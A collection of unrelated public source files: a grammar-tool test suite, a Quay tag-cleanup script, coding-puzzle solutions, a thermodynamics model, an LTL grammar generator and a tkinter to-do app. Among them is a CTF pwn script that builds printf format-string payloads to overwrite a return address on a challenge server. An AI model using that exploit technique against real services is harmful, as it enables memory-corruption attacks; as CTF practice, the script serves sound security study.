orig_wd = None
tmpdir = None
try:
orig_wd = host.getcwd()
tmpdir = host.mkdtemp()
host.chdir(tmpdir)
host.write_text_files(files)
self._call(host, args, returncode=0)
return host.read_text_files(tmpdir)
finally:
if tmpdir:
host.rmtree(tmpdir)
if orig_wd:
host.chdir(orig_wd)
def check_cmd(self, args, stdin=None, files=None,
returncode=None, out=None, err=None, output_files=None,
actual_output_files=None):
host = self._host()
orig_wd = None
tmpdir = None
try:
orig_wd = host.getcwd()
tmpdir = host.mkdtemp()
host.chdir(tmpdir)
if files:
host.write_text_files(files)
rv = self._call(host, args, stdin, returncode, out, err)
actual_ret, actual_out, actual_err = rv
if output_files:
actual_output_files = host.read_text_files(host.getcwd())
finally:
if tmpdir:
host.rmtree(tmpdir)
if orig_wd:
host.chdir(orig_wd)
if output_files:
self._assert_files(output_files, actual_output_files)
return actual_ret, actual_out, actual_err
def _host(self):
return FakeHost()
def _call(self, host, args, stdin=None, returncode=None, out=None,
err=None):
if stdin is not None:
host.stdin.write(str(stdin))
host.stdin.seek(0)
actual_ret = glop.tool.main(host, args)
actual_out = host.stdout.getvalue()
actual_err = host.stderr.getvalue()
if returncode is not None:
self.assertEqual(returncode, actual_ret)
if out is not None:
self.assertEqual(str(out), actual_out)
if err is not None:
self.assertEqual(str(err), actual_err)
return actual_ret, actual_out, actual_err
def _assert_files(self, expected_files, actual_files):
for k, v in actual_files.items():
self.assertEqual(expected_files[k], v)
self.assertEqual(set(actual_files.keys()), set(expected_files.keys()))
def test_bad_command_line_switch(self):
self.check_cmd(['--not-a-switch'], returncode=2)
def test_ctrl_c(self):
host = FakeHost()
def raise_ctrl_c(*_comps):
raise KeyboardInterrupt
host.read_text_file = raise_ctrl_c
host.write_text_file('simple.g', SIMPLE_GRAMMAR)
self._call(host, ['simple.g'], returncode=130,
out='', err='Interrupted, exiting ...\n')
def test_compile_bad_grammar(self):
files = {
'bad.g': 'grammar',
}
self.check_cmd(['-c', 'bad.g'], files=files,
returncode=1, out='', err=None)
def test_files(self):
files = {
'simple.g': SIMPLE_GRAMMAR,
'input.txt': 'hello, world\n',
}
out_files = files.copy()
out_files['output.txt'] = '"hello, world\\n"\n'
self.check_cmd(['-i', 'input.txt', '-o', 'output.txt',
'simple.g'],
files=files, returncode=0, out='', err='',
output_files=out_files)
def test_grammar_file_not_found(self):
self.check_cmd(['missing.g'], returncode=1,
err='Error: no such file: "missing.g"\n')
def test_help(self):
self.check_cmd(['--help'], returncode=0)
def test_input_is_expr(self):
self.check_cmd(['-e', SIMPLE_GRAMMAR], stdin='hello, world\n',
returncode=0)
def test_input_on_stdin(self):
files = {
'simple.g': SIMPLE_GRAMMAR,
}
self.check_cmd(['-i', '-', 'simple.g'], stdin="hello, world\n",
files=files, returncode=0, out='"hello, world\\n"\n',
err='')
def test_main(self):
host = self._host()
files = {
'simple.g': SIMPLE_GRAMMAR,
}
args = ['-c', '--main', 'simple.g']
output_files = self.check_call_and_return_files(host, args, files)
self.assertIn('simple.py', output_files.keys())
self.assertIn("if __name__ == '__main__'",
output_files['simple.py'])
def test_no_grammar(self):
self.check_cmd([], returncode=2)
def test_no_main(self):
host = self._host()
files = {
'simple.g': SIMPLE_GRAMMAR,
}
args = ['-c', 'simple.g']
output_files = self.check_call_and_return_files(host, args, files)
self.assertIn('simple.py', output_files.keys())
self.assertNotIn("if __name__ == '__main__'",
output_files['simple.py'])
def test_interpret_bad_grammar(self):
files = {
'bad.g': 'grammar',
}
self.check_cmd(['bad.g'], files=files,
returncode=1, out='', err=None)
def test_output_flags(self):
self.check_cmd(['-e', 'grammar = -> "ok"'],
returncode=0, out = '"ok"\n')
self.check_cmd(['-e', 'grammar = -> "ok"', '--as-string'],
returncode=0, out = 'ok\n')
self.check_cmd(['-e', 'grammar = -> "ok"', '--as-string',
'--no-appended-newline'],
returncode=0, out = 'ok')
self.check_cmd(['-e', 'grammar = -> ["o", "k"]', '--as-string'],
returncode=0, out = 'ok\n')
def test_pretty_print(self):
files = {
'simple.g': SIMPLE_GRAMMAR,
}
self.check_cmd(['-p', 'simple.g'], files=files,
returncode=0,
out="grammar = anything*:as end -> join('', as)\n")
def test_pretty_print_glop(self):
# This tests pretty-printing of a non-trivial grammar (glop itself)
# in a limited way: it tests that pretty-printing an already
# pretty-printed grammar doesn't change anything.
h = Host()
glop_contents = h.read_text_file(
h.join(h.dirname(h.path_to_host_module()), '..',
'grammars', 'glop.g'))
files = {'glop.g': glop_contents}
host = self._host()
orig_wd = None
tmpdir = None
try:
orig_wd = host.getcwd()
tmpdir = host.mkdtemp()
host.chdir(tmpdir)
if files:
host.write_text_files(files)
ret, _, _ = self._call(host,
['--pretty-print', 'glop.g',
'-o', 'glop2.g'])
self.assertEqual(0, ret)
ret, _, _ = self._call(host,
['--pretty-print', 'glop2.g',
'-o', 'glop3.g'])
self.assertEqual(0, ret)
actual_output_files = host.read_text_files(host.getcwd())
self.assertMultiLineEqual(actual_output_files['glop2.g'],
actual_output_files['glop3.g'])
finally:
if tmpdir:
host.rmtree(tmpdir)
if orig_wd:
host.chdir(orig_wd)
def test_print_ast(self):
self.check_cmd(['-e', 'grammar = "hello"', '--ast'],
returncode=0,
out='[\n'
' "rules",\n'
' [\n'
' [\n'
' "rule",\n'
' "grammar",\n'
' [\n'
' "lit",\n'
' "hello"\n'
' ]\n'
' ]\n'
' ]\n'
']\n')
def test_version(self):
self.check_cmd(['-V'], returncode=0, out=(glop.tool.VERSION + '\n'),
err=None)
self.check_cmd(['--version'], returncode=0, out=(glop.tool.VERSION + '\n'),
err=None)
| dpranke/glop | tests/tool_test.py | tool_test.py | py | 8,564 | python | en | code | 4 | github-code | 36 |
3156449566 | #!/usr/bin/python3
# Script responsible for removing extra tags of nightly images
# QUAY_ACCESS_TOKEN is needed to set as environment variable before executing script
# The access token is used for authentication against the quay api.
import os
import json
import requests
from dateutil.relativedelta import *
from dateutil.easter import *
from dateutil.rrule import *
from dateutil.parser import *
from datetime import *
import argparse
try:
QUAY_ACCESS_TOKEN = os.environ['QUAY_ACCESS_TOKEN']
except KeyError as e:
print("QUAY_ACCESS_TOKEN environment variable is not set. Please, set it before running the script.")
exit('Script exiting....')
REGISTRY = "quay.io"
NAMESPACE = "kiegroup"
IMAGES={"kogito-data-index-nightly","kogito-quarkus-ubi8-nightly",
"kogito-quarkus-jvm-ubi8-nightly","kogito-quarkus-ubi8-s2i-nightly",
"kogito-springboot-ubi8-nightly","kogito-springboot-ubi8-s2i-nightly",
"kogito-jobs-service-nightly","kogito-management-console-nightly",
"kogito-cloud-operator-nightly"
}
def get_image_tags(image):
'''
Get all the available tags for the image
:param image: image name whose tags needs to be fetched
:return: tags: List of a strcut with tagName and lastModified as fields
'''
tags = []
r = requests.get('https://{0}/api/v1/repository/{1}/{2}/tag/?onlyActiveTags=true'.format(REGISTRY,NAMESPACE,image) , headers={'content-type': 'application/json', 'Authorization': 'Bearer ' + QUAY_ACCESS_TOKEN })
image_metadata= json.loads(r.text)
num_tags = len(image_metadata['tags'])
for i in range(num_tags):
tags.append({
"tagName" : image_metadata['tags'][i]['name'],
"lastModified" : parse(image_metadata['tags'][i]['last_modified'])
})
return tags
def delete_image_tags(image, tags):
'''
Deletes the extra image tags from the repository
:param image: Image whose tags needs to be deleted
:param tags: List of struct with `tagName` and `last_modified` as fields for the image that needs to be deleted
'''
if len(tags) == 0:
print("Image {} does not have extra tags that needs to be deleted".format(image))
else:
for tag in tags:
requests.delete('https://{0}/api/v1/repository/{1}/{2}/tag/{3}'.format(REGISTRY,NAMESPACE,image,tag['tagName']) , headers={'content-type': 'application/json', 'Authorization': 'Bearer ' + QUAY_ACCESS_TOKEN })
print("Successfully deleted {} tags for the image {}".format(len(tags),image))
def get_and_delete_old_tags(image,max_tags):
'''
Driver function, calls the `get_image_tags` to get all the available tags for a image
finds the tags that needs to be deleted and then passes them to `delete_image_tags`
:param image: image name whose old tags needs to be deleted
:param max_tags: Number of maximum tags to be kept for the image
'''
all_tags = get_image_tags(image)
all_tags = list(filter(lambda tag: tag["tagName"]!="latest", all_tags)) #Filter out the entry with latest as tagName from the struct list
all_tags.sort(key=lambda tagInfo: tagInfo.get("lastModified")) #sorting in ascending order to get oldest tag on top
delete_tags = []
if (len(all_tags) - max_tags) > 0:
delete_tags = all_tags[:len(all_tags) - max_tags]
delete_image_tags(image,delete_tags)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Removes extra tags from the registry')
parser.add_argument('--max-tags', dest='max_tags', default=50,type=int, help='Defines the maximum number of tags for the image to be available, defaults to 10')
args = parser.parse_args()
for image in IMAGES:
get_and_delete_old_tags(image,args.max_tags)
| kiegroup/kogito-pipelines | tools/clean-nightly-tags.py | clean-nightly-tags.py | py | 3,786 | python | en | code | 2 | github-code | 36 |
22836675271 | n = int(input())
n_list = input()
m = int(input())
m_list = input()
n_list = list(map(int, n_list.split(" ")))
m_list = list(map(int, m_list.split(" ")))
dic = {}
for i in n_list:
if i not in dic:
dic[i] = 1
else:
dic[i] = dic[i]+1
for i in m_list:
if i in dic:
print(dic[i], end=" ")
else:
print(0,end=" ")
| KuBonWhi/Algorithm | Backjoon/BOJ_10816.py | BOJ_10816.py | py | 360 | python | en | code | 0 | github-code | 36 |
25489916263 | import pytest
import pytest_spec.basic as basic
class TestErrors:
def test_zero(parameter_list):
with pytest.raises(ZeroDivisionError) as e:
basic.division_by_zero(1)
assert e.type == ZeroDivisionError
assert e.typename == "ZeroDivisionError"
assert str(e.value) == "division by zero"
# 引数を変えて行うtest
def add(a, b):
if type(a) is not int or type(b) is not int:
raise TypeError
return a + b
@pytest.mark.parametrize("a,b,expected", [(1, 2, 3), (4, 5, 9), (10, 23, 33)])
def test_add(a, b, expected):
assert add(a, b) == expected
# 引数を変えて、いずれも例外を吐くことを確認するtest
@pytest.mark.parametrize("a,b,expected", [("1", 2, 3), (None, 5, 9), (10, [1], 33)])
def test_add_2(a, b, expected):
with pytest.raises(TypeError):
add(a, b)
| atu4403/pytest_spec | tests/basic/test_basic.py | test_basic.py | py | 865 | python | en | code | 0 | github-code | 36 |
42735837127 | # -------------------------------------------------
# [programmers] 큰수 만들기 (그리디)
# 1. 가장 큰 수를 찾음
# 2. 가장 큰수의 왼쪽 중 가장 작은 수 날림
# 3. k의 개수가 남으면 가장 큰수 오른쪽 가장 작은수 날림
# -------------------------------------------------
# def solution(number, k):
# max_value = max(number) # 아스키 코드로 가장 큰 문자열 반환
# # for i in number[::-1]:
# # if i > max_value:
# # max_value = i
# left = []
# right = []
# for i in range(len(number)):
# if max_value == number[i]:
# left, right = list(number[:i]), list(number[i:]) # 큰 수 기준 왼쪽리스트, 오른쪽 리스트 나눔
# break # 첫번째로 큰수만나면 탈출
# while(k):
# if len(left) != 0:
# left.remove(min(left))
# k -= 1
# else:
# # k가 남고 left가 0이면
# right.remove(min(right))
# k -= 1
# answer = "".join(left + right)
# return answer
# print(solution("01010", 3))
# ----------------------------------------------------------------
# 테스트 케이스 2 ~ 10 실패
# 실패요인 : 예제 테스트케이스들만 고려해 알고리즘을 해석
# ----------------------------------------------------------------
def solution(number, k):
answer = [] # stack
for i in number:
if len(answer) == 0:
answer.append(i)
continue
if k>0:
while answer[-1] < i:
answer.pop()
k -= 1
if len(answer) == 0 or k <= 0:
break
answer.append(i)
if k > 0: # "4321" 앞의 숫자가 뒤의 숫자 보다 모두 큰 경우(뒤부터 k개수 삭제)
answer = answer[:-k]
else:
answer
return ''.join(answer)
print(solution("928857066163493066555730841879", 7)) | jungbin97/pythonworkspace | 그리디/[programmers]큰수만들기.py | [programmers]큰수만들기.py | py | 2,003 | python | ko | code | 0 | github-code | 36 |
20405571634 | from tespy.networks import Network
from tespy.components import (Turbine, Pump, Condenser, HeatExchangerSimple, CycleCloser, Source, Sink)
from tespy.connections import Connection, Bus
import matplotlib.pyplot as plt
import numpy as np
def easy_process():
# network
fluid_list = ['Water']
rankine_nw = Network(fluids=fluid_list)
rankine_nw.set_attr(T_unit='C', p_unit='bar', h_unit='kJ / kg')
# components
turb = Turbine('turbine')
cond = Condenser('condenser')
so = Source('source')
si = Sink('sink')
pump = Pump('pump')
stm_gen = HeatExchangerSimple('steam generator')
cc = CycleCloser('cycle closer')
# define connections and add to network
conn_cc_turb = Connection(cc, 'out1', turb, 'in1', label='1')
conn_turb_cond = Connection(turb, 'out1', cond, 'in1', label='2')
conn_cond_pump = Connection(cond, 'out1', pump, 'in1', label='3')
conn_pump_stm_gen = Connection(pump, 'out1', stm_gen, 'in1', label='4')
conn_stm_gen_cc = Connection(stm_gen, 'out1', cc, 'in1', label='0')
rankine_nw.add_conns(conn_cc_turb,
conn_turb_cond,
conn_cond_pump,
conn_pump_stm_gen,
conn_stm_gen_cc)
# define connections and add to network
conn_so_cond = Connection(so, 'out1', cond, 'in2', label='11')
conn_cond_si = Connection(cond, 'out2', si, 'in1', label='12')
rankine_nw.add_conns(conn_so_cond,
conn_cond_si)
# set the component and connection parameters.
# turbine
# m input, P output or the opposite
turb.set_attr(eta_s=0.9)
conn_cc_turb.set_attr(m=5, p=100, T=500, fluid={'Water': 1})
conn_turb_cond.set_attr(x=0.95)
# condenser
cond.set_attr(pr1=1, pr2=1)
conn_so_cond.set_attr(m=1000, p=1, T=20, fluid={'Water': 1})
# pump
conn_pump_stm_gen.set_attr(x=0)
stm_gen.set_attr(pr=1)
rankine_nw, powergen = assess_elect_power(rankine_nw, turb, pump)
return rankine_nw
def analyze_process():
"""
we will analyze the power production and the efficiency of the cycle, given constant steam mass flow and with
varying values for the
live steam pressure,
live steam temperature and
cooling water temperature level.
"""
# network
fluid_list = ['Water']
rankine_nw = Network(fluids=fluid_list)
rankine_nw.set_attr(T_unit='C', p_unit='bar', h_unit='kJ / kg')
# components
turb = Turbine('turbine')
cond = Condenser('condenser')
so = Source('source')
si = Sink('sink')
pump = Pump('pump')
stm_gen = HeatExchangerSimple('steam generator')
cc = CycleCloser('cycle closer')
# define connections and add to network
conn_cc_turb = Connection(cc, 'out1', turb, 'in1', label='1')
conn_turb_cond = Connection(turb, 'out1', cond, 'in1', label='2')
conn_cond_pump = Connection(cond, 'out1', pump, 'in1', label='3')
conn_pump_stm_gen = Connection(pump, 'out1', stm_gen, 'in1', label='4')
conn_stm_gen_cc = Connection(stm_gen, 'out1', cc, 'in1', label='0')
rankine_nw.add_conns(conn_cc_turb,
conn_turb_cond,
conn_cond_pump,
conn_pump_stm_gen,
conn_stm_gen_cc)
# define connections and add to network
conn_so_cond = Connection(so, 'out1', cond, 'in2', label='11')
conn_cond_si = Connection(cond, 'out2', si, 'in1', label='12')
rankine_nw.add_conns(conn_so_cond,
conn_cond_si)
# set the component and connection parameters.
# turbine
# m input, P output or the opposite
turb.set_attr(eta_s=0.90) #
conn_cc_turb.set_attr(m=10, p=150, T=600, fluid={'Water': 1}) #
conn_turb_cond.set_attr(p=0.1) #
# conn_turb_cond.set_attr(x=0.95)
# condenser
cond.set_attr(pr1=1, pr2=1, ttd_u = 10) #
conn_so_cond.set_attr( p=1.2, T=20, fluid={'Water': 1}) #
# conn_cond_si.set_attr(T=30) #
# pump
pump.set_attr(eta_s=0.75) #
# conn_pump_stm_gen.set_attr(x=0)
# steam generator
stm_gen.set_attr(pr=0.9) #
rankine_nw, powergen = assess_elect_power(rankine_nw, turb, pump)
"""
### from here starts the analysis ###
"""
data, eta, power = define_data()
""" case 1:T steam is variable. p steam and T cooling constant """
# for T in data['T_livesteam']:
# conn_cc_turb.set_attr(T=T)
# rankine_nw.solve('design')
# eta['T_livesteam'] += [abs(powergen.P.val) / stm_gen.Q.val * 100]
# power['T_livesteam'] += [abs(powergen.P.val) / 1e6]
""" case 2:T cooling is variable. T steam and p steam constant """
conn_cc_turb.set_attr(T=600)
for T in data['T_cooling']:
conn_so_cond.set_attr(T=T)
rankine_nw.solve('design')
eta['T_cooling'] += [abs(powergen.P.val) / stm_gen.Q.val * 100]
power['T_cooling'] += [abs(powergen.P.val) / 1e6]
return rankine_nw
def define_data():
data = {
'T_livesteam': np.linspace(450, 750, 7),
'T_cooling': np.linspace(15, 45, 7),
'p_livesteam': np.linspace(75, 225, 7)
}
eta = {
'T_livesteam': [],
'T_cooling': [],
'p_livesteam': []
}
power = {
'T_livesteam': [],
'T_cooling': [],
'p_livesteam': []
}
return data, eta, power
def assess_elect_power(rankine_nw, turb, pump):
powergen = Bus("electrical power output")
powergen.add_comps(
{"comp": turb, "char": 0.97, "base": "component"},
{"comp": pump, "char": 0.97, "base": "bus"},
)
# base: definition of efficiency -> see docu
# see difference between component value and bus value in results
# turbine: bus > component. mech to ele
# pump: component > bus. ele to mech
rankine_nw.add_busses(powergen)
return rankine_nw, powergen
def solve(rankine_nw):
# solve
rankine_nw.set_attr(iterinfo=False) # disable the printout of the convergence history
rankine_nw.solve(mode='design')
rankine_nw.print_results()
if __name__ =='__main__':
# rankine_nw = easy_process()
rankine_nw = analyze_process()
solve(rankine_nw)
| JubranKhattab/testing_tespy_projects | rankine_cycle.py | rankine_cycle.py | py | 6,236 | python | en | code | 0 | github-code | 36 |
74207679783 | import random
from ltl.spot2ba import Automaton
import ltl.worlds.craft_world as craft
from collections import defaultdict
# TODO: add `grass` and `toolshed` back
GRAMMAR = """
BinOp -> 'and' | 'or'
UOp -> 'do not' | 'you should not'
Not -> 'not'
Item -> 'apple' | 'orange' | 'pear'
Landmark -> 'flag' | 'house' | 'tree'
Predicate -> 'be around the' Landmark | 'be near the' Landmark | 'go to the' Landmark | 'hold the' Item | 'take the' Item | 'possess the' Item
p -> Predicate | UOp Predicate | Predicate BinOp Predicate | UOp p
S -> Safety | Guarantee | Obligation | Recurrence | Persistence | Reactivity
SPrefix -> 'always' | 'at all times,'
SSuffix -> 'forever' | 'at all times' | 'all the time'
Safety -> SPrefix p | p SSuffix | Safety BinOp Safety
GPrefix -> 'eventually' | 'at some point'
NotPredicate -> UOp Predicate
Guarantee -> GPrefix p | 'guarantee that you will' Predicate | 'guarantee that you' NotPredicate | Guarantee BinOp Guarantee
Obligation -> Safety BinOp Guarantee | Obligation BinOp Safety | Obligation BinOp Guarantee
Recurrence -> 'eventually,' p 'and do this repeatedly' | Recurrence BinOp Recurrence
Persistence -> 'at some point, start to' p 'and keep doing it' | Persistence BinOp Persistence
Reactivity -> Recurrence BinOp Persistence | Reactivity BinOp Recurrence | Reactivity BinOp Persistence
"""
#GRAMMAR = """
# BinOp -> 'and' | 'or'
# UOp -> 'do not' | 'avoid'
# Not -> 'not'
# Item -> 'apple' | 'orange' | 'pear'
# Landmark -> 'flag' | 'house' | 'tree'
# Predicate -> 'be around' Landmark | 'be near' Landmark | 'hold' Item | 'take' Item
# p -> Predicate | UOp Predicate | Predicate BinOp Predicate | UOp p
# S -> Safety | Guarantee | Obligation | Recurrence | Persistence | Reactivity
# SPrefix -> 'always'
# SSuffix -> 'forever'
# Safety -> SPrefix p | p SSuffix | Safety BinOp Safety
# GPrefix -> 'eventually' | 'at some point'
# Guarantee -> GPrefix p | 'make' Predicate 'happen' | 'make' Predicate Not 'happen' | Guarantee BinOp Guarantee
# Obligation -> Safety BinOp Guarantee | Obligation BinOp Safety | Obligation BinOp Guarantee
# Recurrence -> 'at some point,' p 'for a while' | Recurrence BinOp Recurrence
# Persistence -> 'at some point, start' p 'and keep doing it' | Persistence BinOp Persistence
# Reactivity -> Recurrence BinOp Persistence | Reactivity BinOp Recurrence | Reactivity BinOp Persistence
#"""
CLASS_LTL_PREFIX = {
'Safety': 'G ',
'Guarantee': 'F ',
'Recurrence': 'G F ',
'Persistence': 'F G '
}
class SentenceGrammar(object):
def __init__(self, recipe_path):
self._prod = defaultdict(list)
self.grammar = ''
self.create_grammar(recipe_path)
self.parse_grammar()
def create_grammar(self, recipe_path):
rules = filter(lambda x: x != '', GRAMMAR.split('\n'))
cookbook = craft.Cookbook(recipe_path)
for rule in rules:
line = ''
if (rule.split()[0] == 'Item'):
line = ' Item -> '
for primitive in cookbook.original_recipes['primitives']:
line += primitive + ' | '
line = line[:-3]
elif (rule.split()[0] == 'Landmark'):
line = ' Landmark -> '
for landmark in cookbook.original_recipes['environment']:
# TODO: This is a very hacky way to get the landmarks
if (not '_' in landmark):
line += landmark + ' | '
line = line[:-3]
else:
line = rule
self.grammar += line + '\n'
self.grammar = self.grammar[:-1]
def parse_grammar(self):
rules = filter(lambda x: x != '', self.grammar.split('\n'))
for rule in rules:
rule = rule.strip().split(' -> ')
lhs = rule[0]; rhs = rule[1]
prods = rhs.split(' | ')
for prod in prods:
self._prod[lhs].append(prod)
def gen_single_prod(self, prod, cfactor=0.25, pcount=defaultdict(int), excludes=None, negate=False):
if '\'' in prod:
tmp_tokens = filter(lambda x: x != '', prod.split('\''))
# fix for Predicate Not, TODO: find a better fix
tokens = []
for token in tmp_tokens:
if 'Not' in token:
tokens.extend(token.strip().split(' '))
else:
tokens.append(token)
else:
tokens = filter(lambda x: x != '', prod.split(' '))
out = []; formula = []; need_brackets = False
if excludes is None:
excludes = []
should_negate = 'UOp' in prod or 'Not' in prod
if should_negate: # avoid double-negate if there is one negation
excludes.extend(['UOp', 'Not'])
for token in tokens:
token = token.strip()
if token in self._prod.keys():
sentence, formula_part = self.gen_random(token, \
cfactor=cfactor, pcount=pcount, excludes=excludes, negate=should_negate)
if token in ['Item', 'Landmark']:
formula.append('( ' + ''.join(sentence.split(' ')) + ' )')
excludes.append(sentence)
elif sentence == 'and':
formula.append('&')
need_brackets = True
elif sentence == 'or':
formula.append('|')
need_brackets = True
elif token in ['UOp', 'Not']:
formula.append('!')
need_brackets = True
if token == 'Not': # swap predicate and not
formula[-1] = formula[-2]; formula[-2] = '!'
elif len(formula_part) > 0:
formula.append(formula_part)
out.append(sentence)
else:
out.append(token)
excludes = None
# combine formulas
if len(formula) > 0:
formula = ' '.join(formula)
if need_brackets:
formula = '( ' + formula + ' )'
else:
formula = ''
return ' '.join(out), formula
def _weighted_choice(self, weights):
rnd = random.random() * sum(weights)
for i, w in enumerate(weights):
rnd -= w
if rnd < 0:
return i
def gen_random(self, symbol, cfactor=0.25, pcount=defaultdict(int), excludes=None, negate=False):
sentence = ''; weights = []; formula = ''
if excludes is None:
excludes = []
for i, prod in enumerate(self._prod[symbol]):
skip = False
for token in excludes:
if token in prod:
weights.append(0.01)
skip = True
break
if skip:
continue
elif prod in pcount:
weights.append(cfactor ** (pcount[prod]))
else:
weights.append(1.0)
# sample for a production
rand_prod = self._prod[symbol][self._weighted_choice(weights)]
pcount[rand_prod] += 1
if rand_prod in self._prod.keys():
sentence, formula = self.gen_random(rand_prod, cfactor=cfactor, pcount=pcount, excludes=excludes, negate=negate)
else:
sentence, formula = self.gen_single_prod(rand_prod, cfactor=cfactor, pcount=pcount, excludes=excludes, negate=negate)
if 'UOp' not in rand_prod and 'BinOp' not in rand_prod and \
symbol in ['Safety', 'Guarantee', 'Recurrence', 'Persistence']:
formula = '( ' + CLASS_LTL_PREFIX[symbol] + formula + ' )'
# backtracking: clear the modification to pcount
pcount[rand_prod] -= 1
exclude = None
sentence = sentence.replace("to do not", "to not")
sentence = sentence.replace("to you should not", "to not")
sentence = sentence.replace("you do not be", "you not be")
return sentence, formula
def gen_sentence(self, n=1):
return [self.gen_random('S') for _ in range(n)]
if __name__ == '__main__':
grammar = SentenceGrammar()
for sentence, formula in grammar.gen_sentence(n=10):
print('Sentence:', sentence)
print(' LTL:', formula)
alphabets = ['boundary', 'C_boundary', 'tree', 'C_tree', 'house', 'C_house', 'flag', 'C_flag', 'orange', 'C_orange','apple', 'C_apple', 'pear', 'C_pear']
Automaton(formula, alphabets, add_flexible_state=False)
| czlwang/ltl-environment-dev | ltl/language/generator.py | generator.py | py | 8,694 | python | en | code | 0 | github-code | 36 |
34455554450 | # -*- coding: utf8 -*-
from django.db import models
class Timer(models.Model):
""" Модель таймера """
start_time = models.DateTimeField(
verbose_name="Время начала",
null=True,
blank=True
)
end_time = models.DateTimeField(
verbose_name="Время конца",
null=True,
blank=True
)
result_time = models.DurationField(
verbose_name="Время затраченное на задачу",
null=True,
blank=True
)
task_user = models.ForeignKey(
'TaskUser',
on_delete=models.CASCADE,
related_name='timers_task_user',
verbose_name='Задачи пользователя'
)
def __str__(self):
return f'Время начала: {self.start_time}. Время конца: {self.end_time}'
class Meta:
db_table = 'timers'
app_label = 'models_app'
verbose_name = 'Таймер'
verbose_name_plural = 'Таймеры'
| Aplles/project_tracker | models_app/models/timer/models.py | models.py | py | 1,025 | python | ru | code | 0 | github-code | 36 |
36728079897 | #!/usr/bin/env python2
from pwn import *
IP, PORT = 'pwn01.chal.ctf.westerns.tokyo', 12463
DEBUG = False
context.arch = 'x86_64'
context.aslr = False
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
def hn(prev, targ):
val = targ - prev
return (val & 0xffff) if (val & 0xffff) > 0 else 0x10000
def hhn(prev, targ):
val = targ - prev
return (val & 0xff) if (val & 0xff) > 0 else 0x100
def do_leak():
payload = ("%lx|" * 0x3f)[:-1]
p.sendline(payload)
return list(map(lambda x: int(x, 16), p.recvline(False).split('|')))
while True:
try:
# let's go gacha and :pray:
#printf_rsp = 0xdf20 # just before entering dprintf()
printf_rsp = 0x7e50
RET = printf_rsp + 0x38 # returning back to main
AGAIN_IP = 0x8E
A_pi = 18
B_pi = 46
A = printf_rsp + (A_pi - 5) * 8 # 18$
B = printf_rsp + (B_pi - 5) * 8 # 46$
fd_ofs = 0x4c
def flip_ret():
payload = "%c"*(A_pi - 2) + f"%{hn((A_pi - 2), A)}c"
payload += "%hn"
payload += "%c"*(B_pi - A_pi - 2) + f"%{hn((B_pi - A_pi - 2) + A, RET)}c"
payload += "%hn"
payload += f"%{hhn(RET, AGAIN_IP)}c%{A_pi}$hhn"
assert(len(payload) < 200)
print(payload+'\n' + str(len(payload)))
def write_ret(ofs, val):
C = printf_rsp + ofs
truect = 0 # manage this value, since we're using %hhn -> %hn
payload = "%c"*(A_pi - 2) + f"%{hhn((A_pi - 2), AGAIN_IP)}c"
payload += "%hhn"
truect += (A_pi - 2) + hhn((A_pi - 2), AGAIN_IP)
payload += "%c"*(B_pi - A_pi - 2) + f"%{hn((B_pi - A_pi - 2) + truect, C)}c"
payload += "%hn"
truect += (B_pi - A_pi - 2) + hn((B_pi - A_pi - 2) + truect, C)
payload += f"%{hhn(truect, val)}c%{A_pi}$hhn"
truect += hhn(truect, val)
payload += f"%{hn(truect, RET)}c%{B_pi}$hn"
assert(len(payload) < 200)
print(payload+'\n' + str(len(payload)))
def leak_ret():
payload = "%16lx|"*0x17
payload += f"%{hhn(17*0x17, AGAIN_IP)}c%{A_pi}$hhn"
assert(len(payload) < 200)
p.sendline(payload)
res = list(map(lambda x: int(x, 16), p.recvuntil('done.\n', True).split('|')[:0x17]))
return res
flip_ret()
write_ret(fd_ofs, 1)
break
except EOFError:
log.warning('retry')
p.close()
continue
except KeyboardInterrupt:
break
| Aleks-dotcom/ctf_lib_2021 | Zh3ro_ctf/pwn/More_printf/public/vuln/randomsol.py | randomsol.py | py | 2,746 | python | en | code | 1 | github-code | 36 |
70593996584 | import math
import os
from itertools import count, cycle
import json
#MUST BE INSTALLED VIA PIP
import tkinter
from tkinter import *
from tkinter import messagebox
from PIL import Image, ImageTk
#-------------------------------------------------------------------------------
#!--- VARS FOR QUESTY STUFF
# goat gifs
goat1 = "./goats/goat1.gif"
goat2 = "./goats/goat2.gif"
goat3 = "./goats/goat3.gif"
current_goat = goat1
# Import Json file to stats
with open("stats.json") as stats_file:
stat_import = json.load(stats_file)
current_level = stat_import["current_level"]
current_xp = stat_import["current_xp"]
needed_xp = stat_import["needed_xp"] * math.ceil(current_level/2)
# Check goat clothes
if current_level <=3:
current_goat = goat1
elif current_level >=4 and current_level <=6:
current_goat = goat2
else:
current_goat = goat3
#DEBUG print(current_goat)
#-------------------------------------------------------------------------------
#!--- ALLOW ANIMATED GIFS
class ImageLabel(tkinter.Label):
def load(self, im):
if isinstance(im, str):
im = Image.open(im)
frames = []
try:
for i in count(1):
frames.append(ImageTk.PhotoImage(im.copy()))
im.seek(i)
except EOFError:
pass
self.frames = cycle(frames)
try:
self.delay = im.info['duration']
except:
self.delay = 100
if len(frames) == 1:
self.config(image=next(self.frames))
else:
self.next_frame()
def unload(self):
self.config(image=None)
self.frames = None
def next_frame(self):
if self.frames:
self.config(image=next(self.frames))
self.after(self.delay, self.next_frame)
#-------------------------------------------------------------------------------
#!--- FUNCTIONS
# Get correct list from selected dropdown option
def display_list(choice):
choice = dropdown_var.get()
print(choice)
# Grab tasks from text file
file_to_open ="lists/" + choice + ".txt"
print(file_to_open)
with open(file_to_open,"r") as tasklist_file:
current_tasklist = tasklist_file.read().splitlines()
task_list.delete(0,END)
for i in current_tasklist:
task_list.insert(END," " + i)
# Checks current experience gain against required XP to level
def check_xp():
global current_level
global current_xp
global needed_xp
global current_goat
if current_xp >= needed_xp:
current_level +=1
current_xp = 0
needed_xp = 5 + current_level * math.ceil(current_level/2)
# Check goat clothes
if current_level <=3:
current_goat = goat1
elif current_level >=4 and current_level <=6:
current_goat = goat2
else:
current_goat = goat3
# WOW THIS SUCKED TO FIX AND FIGURE OUT LMAO (kills the goat and rebirths the asshole with new clothes if needed)
goat_img.configure(image=None)
goat_img.configure(goat_img.load(current_goat))
print(current_goat)
print(current_level," ", current_xp," ",needed_xp)
#!--- BUTTON BEHAVIOURS
# Add a new task
def add_task():
task = new_entry.get()
# # WOW THIS SUCKED TO FIX AND FIGURE OUT LMAO
# goat_img.configure(image=None)
# goat_img.configure(goat_img.load(current_goat))
if task != "":
global current_xp
current_xp +=1
task_list.insert(END," " + task)
new_entry.delete(0, "end")
current_tasklist.append(task)
check_xp()
